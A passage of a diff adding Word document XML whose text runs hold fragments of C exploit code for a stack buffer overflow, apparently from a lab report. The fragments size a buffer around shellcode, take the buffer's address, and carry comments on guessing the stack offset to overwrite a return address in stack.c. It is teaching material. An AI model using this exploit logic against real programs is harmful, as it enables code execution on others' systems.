+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>num</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(buffer) - (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(shellcode) + 1);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> was used as an attempt to guess the stack pointer offset </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>at</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> runtime. This approach was not successful, it drastically </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>changes</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the address of the return we want to overwrite in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>stack.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* offset = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>1]; */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Grab the address of the start of buffer */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = buffer;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Cast the address into a long </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>addrptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = (long*)(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
